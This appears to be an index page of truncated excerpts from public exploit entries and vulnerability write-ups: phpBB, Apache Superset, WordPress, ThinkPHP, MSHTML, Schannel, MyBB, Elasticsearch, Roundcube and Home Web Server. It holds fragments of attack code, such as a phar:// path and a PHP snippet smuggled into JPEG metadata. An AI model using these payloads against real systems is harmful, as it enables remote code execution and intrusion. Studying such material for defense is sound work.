// All greets goes to RIPS Tech // Run this JS on Attachment Settings ACP page var plupload_salt = ''; var form_token = ''; var creation_time = ''; var filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('ev…

# Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Author: David May (david.may@semanticbits.com) # Vendor Homepage: https://superset.apache.org/ # Software Link: https://github.com/apache/incubator-superset…

var wpnonce = ''; var ajaxnonce = ''; var wp_attached_file = ''; var imgurl = ''; var postajaxdata = ''; var post_id = 0; var cmd = '<?php phpinfo();/*'; var cmdlen = cmd.length var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00…

# Exploit Title: ThinkPHP .x < v5.0.23,v5.1.31 Remote Code Execution # Date: -- # Exploit Author: VulnSpy # Vendor Homepage: https://thinkphp.cn # Software Link: https://github.com/top-think/framework/ # Version: v5.x below v5.0.23,v5.1.31 # CVE: N/A…

# Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execution Vulnerability # Google Dork: N/A # Date: March, 13 2019 # Exploit Author: Eduardo Braun Prado # Vendor Homepage: http://www.microsoft.com/ # Software L…

目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和windows的Secure Channel (Schannel)有关 The Secure Channel (Schannel) security package is a Security Support Provider (SSP) that implements the Secure Soc…

catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 MyBB's unset_globals() function can be bypassed under special conditions and it is possible to allows remote code execution. Relevant Link: https://cxsecurity.com/issue/WLB-2015120164…

Elasticsearch has a flaw in its default configuration which makes it possible for any webpage to execute arbitrary code on visitors with Elasticsearch installed. If you're running Elasticsearch in development please read the instructions on how to se…

本文简要记述一下Roundcube 1.2.2远程代码执行漏洞的复现过程. 漏洞利用条件 Roundcube必须配置成使用PHP的mail()函数(如果没有指定SMTP,则是默认开启) PHP的mail()函数配置使用sendmail(默认开启) 关闭PHP配置文件中的safe_mode(默认开启) 攻击者必须知道或者猜出网站根目录的[绝对路径] 需要有一个可登陆的[账号密码account] 影响版本 1.1.x < 1.1.7 1.2.x < 1.2.3 环境搭建 请参考:CentOS6 安…

一.  Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现 漏洞描述: Home Web Server允许调用CGI程序来通过POST请求访问位于/cgi-bin下的文件,然后通过目录遍历,就有可能执行远程主机的任意可执行程序. 漏洞影响范围: Home Web Server 1.9.1 build 164 漏洞复现: 利用原理: NC连接发送打开计算器请求,安装Home Web Server 1.9.1 build 164…